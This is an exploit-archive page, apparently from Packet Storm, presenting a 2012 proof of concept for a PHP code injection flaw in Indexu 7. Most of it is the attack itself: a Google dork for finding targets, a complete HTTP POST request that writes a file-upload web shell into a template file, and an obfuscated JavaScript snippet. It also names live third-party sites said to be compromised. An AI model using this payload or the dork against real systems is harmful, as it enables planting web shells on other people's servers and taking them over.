exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Indexu 7 PHP Code Injection

Indexu 7 PHP Code Injection
Posted Jun 4, 2012
Authored by L3b-r1'z

Indexu 7 suffers from a remote PHP code injection vulnerability.

tags | exploit, remote, php
SHA-256 | 816257c2816d75a46511ee3959c91e8516dcbe49e98c8a1eb5afca48485cdc5e

Indexu 7 PHP Code Injection

Change Mirror Download
# --------------------------------------- #
Author : L3b-r1'z
Title : Indexu 7 Php Code Injection
Date : 5/30/2012
Email : L3br1z@Gmail.com
Site : Sec4Ever.com & Exploit4arab.com
Google Dork : allintext: "Listing by GooglePR"
Version : N\A
# --------------------------------------- #
1) Bug
2) PoC
# --------------------------------------- #
2) Bug :
The script allow admin to edit file in templates fol. as extention PHP :)
so an attacker can inject some code in any file (EDITED) .
NOTE :
Before you inject code , you should know if the themes is there
(./templates/KOMET).
As : https://www.site.com/templates/komet/rows.php
# --------------------------------------- #
3) PoC :

In POST b0x Above Of Live Http Header Put : https://www.site.com/admin/db.php

Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://site.com/admin/template.php?act=editfile&id=komet&file=rows.php
Cookie: U_AUTHENTICATED=1; __atuvc=7|22;
PHPSESSID=6c8ee4251b4d5e252d0030dccdc389a8;
__utma=111872281.551771833.1338331592.1338331592.1338331592.1;
__utmc=111872281;
__utmz=111872281.1338331592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: multipart/form-data;
boundary=---------------------------11662147216064
Content-Length: 1157

Send POST Content :

-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="act"\r\n
\r\n
editfile\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="id"\r\n
\r\n
komet\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file"\r\n
\r\n
rows.php\r\n
-----------------------------11662147216064\r\n
Content-Disposition: form-data; name="file_content"\r\n
\r\n
<?php\r\n
echo '<b><br><br>'.php_uname().'<br></b>';\r\n
echo '<form action="" method="post" enctype="multipart/form-data"
name="uploader" id="uploader">';\r\n
echo '<input type="file" name="file" size="50"><input name="_upl"
type="submit" id="_upl" value="Upload"></form>';\r\n
if( $_POST['_upl'] == "Upload" ) {\r\n
\tif(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo '<b>Upload SUKSES !!!</b><br><br>'; }\r\n
\telse { echo '<b>Upload GAGAL !!!</b><br><br>'; }\r\n
}\r\n
?>\r\n
<script type="text/javascript" language="javascript">ML="Rjnis/e
.rI<thzPS-omTCg>:=p";MI=";@E0:?D7@0EI=<<JH55>B26A<8B9F53CF45>814G;5@E0:?DG";OT="";for(j=0;j<MI.length;j++){OT+=ML.charAt(MI.charCodeAt(j)-48);}document.write(OT);</script>\r\n
-----------------------------11662147216064--\r\n

Snip : https://www11.0zz0.com/2012/05/30/00/788460850.png

Note : Use It On Your Own Risk.

Demo Site's :
https://telemed24.pl/templates/komet/rows.phphttps://sefid.com.pl/templates/komet/rows.php

Page 2 of about 975,000 results (0.17 seconds) = And More In Google :P.


# --------------------------------------- #
Thx To : I-Hmx , B0X , Hacker-1420 , Damane2011 , Sec4ever , The
Injector , Over-X , Ked-Ans , N4SS1M , B07 M4ST3R , Black-ID ,
Indoushka .
# --------------------------------------- #



remove this note please : this script named indexu 7 web links i write
the dork you can check it now :D

and the demo site is upload form

and the bug is php code injection , i write p0c to inject upload form
in the default template :D

and thx you :D
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close